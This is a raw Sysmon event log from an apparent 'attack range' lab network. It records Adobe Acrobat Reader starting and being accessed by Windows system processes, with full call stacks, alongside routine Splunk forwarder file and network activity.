DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.247{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.247{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.232{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8ab30|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.232{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+1078f0|C:\Windows\System32\SHELL32.dll+8aaec|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.232{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.232{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000018713Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:04.105{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50191-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000046823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:07.876{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F488A03324C5DFFAE0601C1E4C8F9270,SHA256=2419B818958E249FFD341A1C489C72BC7680D339B63ABA506190148D33912E5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018715Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:07.918{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E5292857752FC8912C4070B827763FB,SHA256=84823E98351C41735561BF201FED0215C450567C366970223489DEA03B267884,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.969{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.969{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000046846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalMD5=BD2F564185A52E4758B1A7ABB1F5E43E,SHA256=90617357E205123169E5091602ECCB209899BC614CA6D5D56AC77342DFEB3EF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.891{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+986e8|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+97eb6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+94049|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8e9cf|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8e714|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8e647|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64) 154100x800000000000000046840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.882{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe22.3.20310.0Adobe RdrCEFAdobe AcroCEFAdobe Systems IncorporatedAcroCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" 10341000x800000000000000046839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.876{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000046838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:08.876{FE4C2B44-E64A-63C7-8706-00000000AF02}1400\com.adobe.reader.rna.578C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 10341000x800000000000000046837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.876{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.876{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.860{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.860{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000046833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:06.565{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56472-false10.0.1.12-8000- 10341000x800000000000000046832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:08.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\Syste